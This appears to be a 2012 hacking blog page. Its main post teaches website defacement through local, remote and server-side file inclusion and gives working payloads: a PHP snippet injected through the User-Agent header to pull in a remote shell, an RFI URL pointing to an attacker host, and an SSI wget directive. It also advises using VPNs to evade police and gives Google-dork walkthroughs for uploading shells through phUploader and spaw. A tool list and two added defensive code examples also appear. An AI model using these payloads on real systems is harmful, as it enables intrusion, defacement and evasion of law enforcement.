
Showing posts with label Vulnerability Scanner. Show all posts

Wednesday, November 7, 2012

Advanced Exploitation Techniques


Table of Contents
Chapter I: Recon
Chapter II: Getting the tools ready
Chapter III: Getting your ass safe
Chapter IV: Local File Inclusion
Chapter V: Remote File Inclusion
Chapter VI: Server Side Inclusion
Chapter VII: Last word


Chapter I: Recon

All right, imagine this: you are a Navy SEAL, ready to strike Osama bin Laden's house. But... you haven't prepared any strategy or plan, and you haven't found any flaw in the house's security. I bet you could tell me what's going to happen with the mission: COMPLETE FAILURE.
Always plan, plan and, don't forget... plan. Let me briefly explain what I mean by planning. The art of planning is basically gathering information about your target. The information I always collect is: the OS, the CMS it is running, and whether there are any open ports. After I have gathered that information, I usually perform a Paros Proxy scan on the site. Basically, all it does is scan the site for vulnerabilities and produce a fancy report.
If you want to download and use Paros for yourself, be my guest.
All right, now I assume that you have the following information:
which ports are open on the target, the operating system, the CMS the server may be running (not necessary) and your Paros Proxy report. That's basically all the information you need to determine which kind of attack you are going to use against the target.

Chapter II: Tools

Like every job there is, you will need tools.
We hackers need only a very small number of tools to complete our main goal, which is exploiting that one website you wish to deface.
All right, throughout this tutorial we are not going to use fancy tools.
Instead we will be using these key tools: your brain, your hands and, last but certainly not least, Firefox.
Make sure that you have either HTTP Headers or Tamper Data installed as a Firefox plugin.


Chapter III: Safety

In a world where people hack targets, you have another group of people. I bet you feel this coming... the police.
Trust me on this one: once you start hacking big sites, the police will try to get your ass. But not when we are around. We can outsmart the police by using a VPN. VPN stands for Virtual Private Network. Basically it's a server you can connect to, which will intercept all your packets and make them go through their server. All that it does is hide your real IP.
Some free VPNs are: Cyberghost, VPNreactor and nProx.
Once you move on to the bigger sites, I would highly recommend getting a paid VPN like vpntunnel or anonine.


Chapter IV: Local File Inclusion

Most of you have probably heard about this method once or twice. This is the so-called "LFI" exploitation method.
LFI can occur on sites with URLs of this form:

Code:
http://site.com/index.php?page=
When you perform an LFI attack you attempt to bypass the server directories to end up in the proc/self/environ directory. This can be done with ../../../proc/self/environ or if the ../. Useless, you say? WELL, I couldn't disagree more with you on that one. You see, at first sight proc/self/environ seems like a bunch of shit.
It will look something like this:


Code:
TMPDIR=/var/chroot/home/content/23/8340423/tmp
PHPRC=/var/chroot/home/content/23/8340423/html
TEMP=/var/chroot/home/content/23/8340423/tmp
PHP_FCGI_CHILDREN=0
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/web/cgi-bin
SHLVL=0
RAILS_ENV=production
SPI=TRUE
TMP=/var/chroot/home/content/23/8340423/tmp
PHP_FCGI_MAX_REQUESTS=100000
But there is something really cool we can do with this.
We can spawn a shell through this directory...
Now I've got your attention, right? Good. To spawn a shell we simply open up Tamper Data and reload the page while we are tampering.
Once you see a little message pop up, click Tamper Data.
Now we will notice a little User-Agent tab.
In there we will type the following code:

PHP Code:
<?php $file = fopen("shellname.php","w+"); $stream = fopen ("Link you shell here/shell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
Thanks to Legit for that code. It works better than mine with system();
Now once you have done that, click the submit button and your shell should be spawned. To check if it worked, go to http://site.com/shell.php and voila.


Chapter V: Remote File Inclusion

I'm not very glad to say it, but this is one of the good exploit methods that has died. There are almost no websites that have this vulnerability. That's because it's so easy to fix and yet so harmful.
I will briefly explain the so-called "RFI".
RFI, or remote file inclusion, is a technique where you exploit the include(); function.
RFI and LFI are quite similar; there's a catch, though. "Remote" refers to using an external site to upload your shell and "Local" refers to uploading your shell using the same site.
For example: a site includes PHP scripts in an unprotected manner.
A little bit like this:
PHP Code:
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
include( $color . '.php' );
?>

Now to exploit this we will execute the following command:

Code:
http://site.com/index.php?page=http://yourevilsite.com/shell.txt

Now you are wondering... why the hell did he use a .txt shell?
PHP automatically converts .txt to .php, which will result in a nice shell to own/deface the website.

Chapter VI: Server Side Inclusion

Okay, now we move on to the "harder" methods.
Server Side Inclusion, or SSI, is an advanced technique that exploits vulnerabilities in the HTML code.
All this means is that you inject script into HTML forms, and that it will result in spawning a shell or doing something worse.
SSI can only be performed on a few pages. Only pages with .shtml and .shtm are affected by this. These pages are 100% injectable. There is something else to keep in mind: SSI will also work on normal pages, but ONLY when the input is not filtered.
For example, we have a little textbox which is vulnerable to SSI.
We can run some nice little commands here, for example:

Code:
< !--#exec cmd="cd \admin\dir">
< !--#exec cmd="wget http://www.yoursite.com/youknowwutthisis.txt" -->
I will explain these 2 commands to you for a moment.
The first command lets you browse directories that you can't access without administrator privileges. The second command lets you download your shell onto the website (this is the shit we are interested in).
Then the only thing left for you to do is to locate your file by executing this command:

Code:
< !--#exec cmd="cp folderlocation/shellname.txt folderlocation/yourshellname.php" -->
This basically finds your shell.txt, converts it to PHP and places it in the directory of your choice.
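
Seen from the defending side, the requests in Chapters IV to VI leave recognisable traces in a web server access log: traversal to proc/self/environ, PHP tags in a request header, a URL as a parameter value, and SSI directives in input. The following added example (not part of the original post) flags them in combined-format log lines; the sample lines, finding labels and function names are constructed for illustration.

```python
"""Flag access-log entries matching the inclusion requests described above.

Added example. The log lines are constructed; addresses and hosts are
documentation values, and the finding names are this example's own labels.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.I)
SSI_MARK = "<!--#"

# Constructed sample input: one benign request, then one per chapter.
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Nov/2012:10:01:02 +0000] "GET /index.php?page=about '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.23 - - [07/Nov/2012:10:02:11 +0000] "GET /index.php?page='
    '../../../proc/self/environ HTTP/1.1" 200 734 "-" '
    '"<?php /* constructed placeholder */ ?>"',
    '198.51.100.23 - - [07/Nov/2012:10:03:40 +0000] "GET /index.php?page='
    'http://remote.example/shell.txt HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '198.51.100.41 - - [07/Nov/2012:10:05:09 +0000] "GET /guestbook.shtml?msg='
    '%3C!--%23exec%20cmd%3D%22x%22%20--%3E HTTP/1.1" 200 301 "-" "Mozilla/5.0"',
]


def normalise(value):
    """Percent-decode until stable and unify separators before matching."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/").lower()


def classify(line):
    """Return a dict with the findings for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    findings = set()
    parts = urlsplit(m["target"])
    values = [normalise(parts.path)]
    values += [normalise(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    for value in values:
        if "../" in value:
            findings.add("path-traversal")
        if "proc/self/environ" in value:
            findings.add("proc-environ-read")
        if REMOTE_URL_RE.match(value):
            findings.add("remote-url-in-param")
        if SSI_MARK in value:
            findings.add("ssi-directive")
    # Browsers never send PHP tags or SSI directives in these headers.
    for header in (m["agent"], m["referer"]):
        if PHP_TAG_RE.search(header):
            findings.add("php-code-in-header")
        if SSI_MARK in header:
            findings.add("ssi-directive")
    return {
        "ip": m["ip"],
        "target": m["target"],
        "status": int(m["status"]),
        "findings": sorted(findings),
    }


def scan(lines):
    """Return only the parsed entries that carry at least one finding."""
    results = (classify(line) for line in lines)
    return [r for r in results if r and r["findings"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["status"], ",".join(hit["findings"]), hit["target"])
```

A finding is a lead for triage, not proof of compromise; parameters that legitimately carry URLs will also match `remote-url-in-param`.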

Chapter VII: Last things

Well, this was my little tutorial regarding uncommon forms of attack.
I hope you have learned something from it and I hope to hear your personal experiences with this.
If this helped you, please leave any form of thank you. It's highly appreciated.


Saturday, June 2, 2012

VAPT Tools




Vulnerability Assessment And Penetration Testing Tools

VAPT: Vulnerability Assessment And Penetration Testing

Vulnerability assessment is a process in which IT systems such as computers and networks, and software such as operating systems and application software, are scanned in order to identify the presence of known and unknown vulnerabilities.


As many as 70% of web sites have vulnerabilities that could lead to the theft of
sensitive corporate data such as credit card information and customer lists.


Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the
world, insecure web applications provide easy access to backend corporate databases.


VAPT can be performed in the following nine-step process:

Scope:
While performing assessments and tests, the scope of the assignment needs to be
clearly defined. The scope is based on the assets to be tested. The following are the
three possible scopes that exist


Black Box Testing: Testing from an external network with no prior knowledge of the internal networks and systems
Gray Box Testing: Testing from an external or internal network, with knowledge of the internal networks and systems. This is usually a combination of black box testing and white box testing
White Box Testing: Performing the test from within the network with the knowledge
of the network architecture and the systems. This is also referred to as internal testing

Information Gathering

The process of information gathering is to obtain as much information as possible
 about the IT environment such as networks, IP addresses, operating system version,
etc. This is applicable to all the three types of scope as discussed earlier.


Vulnerability Detection

In this process, tools such as vulnerability scanners are used, and vulnerabilities are identified in the IT environment by way of scanning.

Information Analysis and Planning

This process is used to analyze the identified vulnerabilities, combined with the information gathered about the IT environment, to devise a plan for penetrating into
the network and system


Penetration Testing


In this process, the target systems are attacked and penetrated using the plan devised
 in the earlier process.


Privilege Escalation
After successful penetration into the system, this process is used to identify and
 escalate access to gain higher privileges, such as root access or administrative access
 to the system.


Result Analysis

This process is useful for performing a root cause analysis as a result of a successful compromise to the system leading to penetration, and for devising suitable recommendations in order to make the system secure by plugging the holes in the system.


Reporting

All the findings that are observed during the vulnerability assessment and penetration testing process need to be documented, along with the recommendations, in order to produce the testing report to the management for suitable actions.

Cleanup


Vulnerability assessment and penetration testing involves compromising the system, and during the process, some of the files may be altered. This process ensures that the system is brought back to the original state, before the testing, by cleaning up
 (restoring) the data and files used in the target machines.


FIMAP

FIMAP is a Local and Remote file inclusion auditing Tool (LFI/RFI).
Fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection.  


Download 



ZAProxy v1.3.0 – Integrated Penetration Testing Tool


ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.
ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
Main features:
Intercepting Proxy, Automated scanner, Passive scanner, Brute Force scanner, Spider, Fuzzer, Port scanner, Dynamic SSL certificates, API, Beanshell integration.

Download 
ZAP v1.3.0
Windows Installer – ZAP_1.3.0_Windows.exe
Linux Installer – ZAP_1.3.0_Linux.tar.gz


Burp Suite Free Edition v1.4 –
Web Application Security Testing Tool


Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Download Burp Suite Free Edition v1.4
burpsuite_v1.4.zip    


Acunetix 
Web Vulnerability Scanner

Acunetix Web Vulnerability Scanner includes many innovative features:

1. AcuSensor Technology
2. An automatic client script analyzer allowing for security testing of Ajax and Web 2.0 applications.
3. Industry's most advanced and in-depth SQL injection and Cross site scripting testing.
4. Advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer.
5. Visual macro recorder makes testing web forms and password protected areas easy.
6. Support for pages with CAPTCHA, single sign-on and Two Factor authentication mechanisms.
7. Extensive reporting facilities including VISA PCI compliance reports.
8. Multi-threaded and lightning fast scanner crawls hundreds of thousands of pages with ease.
9. Intelligent crawler detects web server type and application language.
11. Acunetix crawls and analyzes websites including flash content, SOAP and AJAX.
12. Port scans a web server and runs security checks against network services running on the server.
Download Trial Edition


DirectoryScanner: Directory Server fingerprinting Tool


DirectoryScanner is the FREE Directory Server fingerprinting tool. It can help you to remotely detect the type of Directory servers (such as Microsoft Active Directory, Novell eDirectory etc.) running on the local network as well as the Internet.

Also it can be used in Penetration testing while evaluating client environments where multiple Directory servers are deployed.


In addition to this, it can greatly help administrators to remotely keep tab on Directory Servers running in their network. At a time you can use it to scan single or multiple systems in the network.

It is helpful to perform a quick audit on network and gather information for further analysis.

It can detect following popular directory Servers:

  • Novell eDirectory
  • Microsoft Active Directory
  • Open LDAP Directory
  • Sun One Directory
  • Netscape Directory
  • IBM Lotus Domino
  • Oracle Directory


Download DirectoryScanner from here: Download



Pentesting Tools Used for Web Vulnerability Assessment

1. w3af

w3af or Web Application Attack and Audit Framework is an open source penetration testing tool for finding web vulnerabilities and an exploit tool that comes with cool plugins like sqlmap, xssBeef, and davShell. w3af automatically updates itself every time you launch the tool making it a very reliable tool for website hacking.  For more information just check out their website hosted at SourceForge.

2. Acunetix Web Vulnerability Scanner


Acunetix WVS or Web Vulnerability Scanner is a pentesting tool for Windows users so that they may be able to check for SQL Injection, Cross Site Scripting (XSS), CRLF injection, Code execution, Directory Traversal, File inclusion, checks for vulnerabilities in File Upload forms and other serious web vulnerabilities. You can download this tool here.

3. SQLninja

SQLninja is an SQL injection tool for web applications that use Microsoft SQL Server as their back-end, though it runs only on Linux, Mac and BSD. It requires the Perl modules NetPacket, Net-Pcap, Net-DNS, Net-RawIP, and IO-Socket-SSL. You can download this tool here.

4. Nikto

Nikto is an open source web server scanner "which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files or CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers." The good thing about Nikto is that it is easy to use and performs scanning faster. Nikto is coded in Perl and written by Chris Sullo and David Lodge. Although not all checks are really a big security problem, most are, like XSS (Cross Site Scripting) vulnerabilities, phpMyAdmin logins, etc. Nikto alerts and gives you security tips in order to prevent your website from various attacks.

5. SQLmap

SQLmap is an open source automatic SQL injection and database takeover tool that fully supports MySQL, Oracle, PostgreSQL and Microsoft SQL Server. It partially supports Microsoft Access, DB2, Informix, Sybase and Interbase. Download sqlmap here.


6. Pangolin 3.2.3

Pangolin is another SQL injection scanner for web applications using Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, Sqlite3, and Sybase. Its features include keyword auto analysis, supports HTTPS, has bypass firewall setting, injection digger, data dumper, etc. You can download its zip file here.

7. Havij v1.15 Advanced SQL Injection

Havij is another famous automatic sql injection tool that has a free and premium version. The free version only supports a few injection methods like MsSQL 2000/2005 with error, MsSQL 2000/2005 no error union based, MySQL union based, MySQL Blind, MySQL error based, MySQL time based, Oracle union based, MsAccess union based, and Sybase (ASE). It also includes an admin finder and an md5 cracker. 


8. SQL Power Injector 

SQL Power Injector is a web pentesting application created in .Net 1.1 that helps the penetration tester and hackers find and exploit SQL injections on a web application that uses SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant, but it is possible to use it with any existing Database Management System when using the inline injection or normal mode. You can download the latest version of this tool which includes a Firefox plugin here.

9. VulnDetector

VulnDetector is a project coded in python which scans a website and detects various web based security vulnerabilities in the website. It was developed by Brad Cable who is into coding open source tools. You can download the script here.

10. SQLIer 0.8.2b
SQLIer is another project of Brad Cable and is a shell script that determines all the necessary information to build and exploit an SQL Injection vulnerability to a URL by itself without user interaction unless it can't guess the table or field names for the database correctly. SQLIer can build a UNION SELECT query designed to brute force passwords out of the database. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites. Download the shell script here.

11. bsqlbf-v2

bsqlbf-v2 or Blind Sql Injection Brute Forcer version 2 is a perl script that allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. It supports MySQL, Oracle, PostgreSQL and Microsoft SQL Server databases. You can download the perl script on a Google hosted project.

12. Marathon Tool 

Marathon Tool is an alpha release SQL Injection tool or project that extracts information from web applications using Microsoft SQL Server, Microsoft Access, MySQL or Oracle Databases by using Time-Based Blind SQL Injection attack. The alpha release can be found here.

13. XSSer 

XSSer or Cross Site "Scripter" is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications. It also includes a GUI interface, started with the command: ./xsser --gtk. You can download xsser's beta version here.

14. ASP Auditor v2.2

ASP Auditor v2.2 is an auditing tool for ASP that sends initial probe request, path discovery request, ASP.NET validate discovery request, ASP.NET Apr/07 XSS Check, application trace request, and null remoter service request. By using the opt command -bf, it allows you to brute force ASP.NET version using JS Validate directories.

15. Absinthe

"Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection.    This tool does not aid in the discovery of SQL Injection holes but speeds up the process of data recovery." It supports Microsoft SQL Server, MSDE, Oracle, and Postgres and the tool runs on Linux, Windows and Mac OSX. Download here.

16. SQID

SQID or SQL injection digger is a command line tool written in ruby by Metaeye Security Group that looks for SQL injections and common errors in web sites. It performs a Google search when finding for SQL injections and common errors in web site URLs and crawls a webpage. You can download this tool by checking out its project SVN:

svn checkout svn://rubyforge.org/var/svn/sqid 

17. DarkMySQLi

DarkMySQLi is a multi purpose MySQL Injection tool coded in python which is also available for BackTrack 5 as one of its packed tools.

18. fimap 

fimap is an automatic LFI/RFI scanner and exploiter coded in python by Iman Karim. It allows a pentester to scan a single URL for File inclusion errors, scan a list of URLs for File Inclusion errors, scan Google search results for File inclusion errors, and harvest all links of a webpage with recurse level of 3 and write the URLs to a file directory.

19. Script Hex Dump – Forensic Tool

Script Hex Dump - Forensic Tool is a java application that helps you in parsing your scripts like PHP and automatically converts them to hex values; some penetration testers use this to test for possible SQL injection vulnerability in a website. SQL Injection attack has been a chronic threat especially for those websites running PHP and MySQL as the backend of their database server; one of its capabilities, if the server is not properly configured, is the command for writing arbitrary files. You can download this tool here.

20. PHP Vulnerability Hunter

PHP Vulnerability Hunter is a PHP web application fuzzer that scans for common vulnerabilities like local file inclusion, SQL Injection, full path disclosure, arbitrary command execution and many more. A good tool for analyzing your own web server. You can grab the new version of this tool here which is 1.1.4.6.

21. WSTOOL : Web vulnerable scan tool

WSTOOL is a server error and SQL Injection, XSS or Cross Site Scripting scanner which uses PHP Check up collate with HTML FORM and LINK. You can download this tool here.

22. ProjectX WHMCS Pentesting Tool v.1



Projectx WHMCS Pentesting Tool v.1 is a vulnerability scanner coded in VB.NET that uses a black box approach. It echos the db_username and the db_password of a website that is vulnerable to WHMCS Local File Disclosure. This kind of vulnerability is only applicable to versions 3.x.x and some 4.x.x which was a viral exploit last year that some website administrators took for granted. You can download the tool here.

23. Wpscan 

WPscan or Wordpress Security Scanner is a pentesting tool written in ruby for Wordpress installations. The tool is coded by Ryan Dewhurst and uses a black box approach in finding security holes for Wordpress like timthumb, easy to guess passwords, plugin holes, etc. You can download wpscan here.

24. Skipfish
Skipfish is an active web application security reconnaissance tool written by Michal Zalewski. Skipfish spiders a URL using the wordlists, a very powerful web scanning tool with a simple implementation. It also scans for vulnerabilities like php injection, XSS, format string vulnerabilities, overflow vulnerabilities, file inclusions , etc. You can download this tool here.


25. WhatWeb

WhatWeb is a web scanner coded by Andrew Horton aka urbanadventurer from Security-Assessment.com. It is used for information gathering because it identifies content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries, servers, etc. You can download this tool here.

26. OWASP ZAP 

Zed Attack Proxy (ZAP) is a project of OWASP which is a GUI penetration testing tool for finding website vulnerabilities and flaws. This open source tool includes features like  intercepting proxy, active scanner, passive scanner, brute force scanner, spider, fuzzer, port scanner,  dynamic SSL certificates, API, and Beanshell integration. For more information about this tool, check out their website.

27.  Webshag

Webshag is a multi-threaded, multi-platform web server auditing tool coded in python. It is used for crawling a URL, port scanning, file fuzzing and audits your website. You can download this security auditing tool here.

28. OWASP DirBuster

DirBuster is another project of OWASP that is a multi-threaded java application designed to brute force directory and file names on web/application servers; it uses a black box approach for application testing by trying to find hidden content. You can download this tool here.

29. Grendel-Scan

Grendel-Scan is free and open source web application pentesting tool that has an automatic scanning feature which detects common web application vulnerabilities, and features geared at aiding manual penetration tests. Get this tool now.

30. Mopest

Mopest is a PERL Local PHP Vulnerability Scanner for exploits PhpBB 2.0.20 Disable Administrator, PhpBB 2.0.19 Denial of Service - Infinitely topic, phpBB 2.0.15 Database Authentication Details, Invision Power Board 2.0.2 Multiple Users DoS, Invision Power Board 2.1.5 Code Execution, MyBB 1.0 RC4 Sql injection, MyBB 1.1.3 Create An Admin, MyBB Sql Injection, and WordPress 1.5.11 Sql Injection. It also has tools like Fake Mailer, Email Bomber, and MD5 Cracker. You can check out this project here.

31. SecuBat

SecuBat is another web vulnerability scanner which automatically analyzes web sites with the aim of finding exploitable SQL injection and XSS vulnerabilities. You can check this tool here.

32. Arachni



Arachni is an open source web application security scanner framework coded in ruby that helps website administrators and penetration testers evaluate the security of a web application. Arachni asks you for the URL of the target and it automatically performs a simple scan and presents you with its findings which could be a very risky flaw or loophole. You can download this tool here.

33. WebSlayer


WebSlayer is another OWASP project that slays your web application by brute forcing the GET and POST parameters, checking the directories, brute forcing the login forms, fuzzing, brute forcing sessions, NTLM brute forcing, and many more. For more information on this project just check this site.

34. Burp Suite



Burp Suite is a penetration testing tool and integrated platform for website security. Burp Suite has cool features like an intercepting proxy, application spider for crawling, detects numerous web application vulnerabilities, repeater tool, allows you to write your own plugins, and many more. The free edition is available for download here.

35. ProxMon


ProxMon is not a Digimon but a Python based open source framework that automates web application tests. Its key features include:

- automatic value tracing of set cookies, sent cookies, query strings and post parameters across sites,
- proxy agnostic
- included library of vulnerability checks
- active testing mode
- cross platform
- easy to program extensible python framework

You can download this tool here.


phUploader Remote File Upload Vulnerability

Title: phUploader Remote File Upload Vulnerability


Google Dork: intitle:Powered By phUploader

Go to Google.com and enter this dork, then see the search results.
Exploit URL:
http://{site.com}/path/upload.php
or
http://site.com/upload.php


Select any website and upload your file there.
The website allows uploading .jpg .png .gif and .png files only.
Anyway, you can upload your deface as .jpg, and mirror websites like zone-h accept it as a defacement; if you want to upload a shell, then upload it as
shell.php.jpg
After uploading your file you'll get a message:
Your file(s) have been uploaded!


See the link below this message to view your uploaded file.


Live Demo ~ http://humortshirtzone.com/phUploader.php
Uploaded File ~ http://www.humortshirtzone.com/uploads/1321616908.jpg


spaw: Deface and Shell Upload Vulnerability


Spaw is a vulnerability; you can upload your deface and shell easily on vulnerable websites.





Let's start



Open www.google.com
Enter the dork inurl:"spaw2/dialogs/"
or
inurl:"spaw2/uploads/files/"
You will get results like this: "Index of/ spaw2/dialogs/"
or: site.com/abc/spaw2/uploads/files/abc/abc.pdf

Now replace the spaw2/uploads/abc/abc URL with this URL



For example, I got this website

so now I will replace




with

Now the URL is



Now you will get a window like this


If you want to upload a deface page, then select the files option... and if you want to upload a shell, then select the image option and upload your shell as shell.php;,jpg
See your uploaded deface here:


www.site.com/profile/spaw2/uploads/
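
Both upload write-ups above (phUploader and spaw) depend on the server trusting the client-supplied file name. The following added example, not code from either product, shows server-side checks for an image-only upload form that reject names such as shell.php.jpg and shell.php;,jpg; the function names, allowlist and sample bytes are assumptions made for illustration.

```python
"""Server-side checks for an image-only upload form (added example)."""
import re
import secrets

# Allowed extension -> leading bytes that a file of that type starts with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# The part before the extension: no dots, semicolons, slashes or control bytes.
SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")

ERR_EXT = "extension not allowed"
ERR_NAME = "extra extension or unexpected characters in name"
ERR_CONTENT = "content does not match extension"

# Constructed sample: just enough leading bytes to look like a JPEG header.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 16


class UploadRejected(ValueError):
    """Raised when an upload fails one of the checks."""


def validate_upload(client_name, data):
    """Return the server-chosen name to store the file under, or raise."""
    # Drop any directory part the client sent, whichever separator it used.
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    stem, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in ALLOWED:
        raise UploadRejected(ERR_EXT)
    # A second extension (name.php.jpg) matters because some server
    # configurations pick a handler from any extension in the name.
    if not SAFE_STEM.fullmatch(stem):
        raise UploadRejected(ERR_NAME)
    # Sanity check only: matching leading bytes do not prove the file is an
    # image, so the upload directory must also never execute scripts.
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected(ERR_CONTENT)
    # Never reuse the client's name on disk; keep only the vetted extension.
    return secrets.token_hex(16) + "." + ext


def check(client_name, data):
    """Non-raising wrapper: (True, stored_name) or (False, reason)."""
    try:
        return True, validate_upload(client_name, data)
    except UploadRejected as exc:
        return False, str(exc)


if __name__ == "__main__":
    for name in ("holiday.JPG", "shell.php.jpg", "shell.php;,jpg", "logo.png"):
        print(name, "->", check(name, JPEG_SAMPLE))
```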
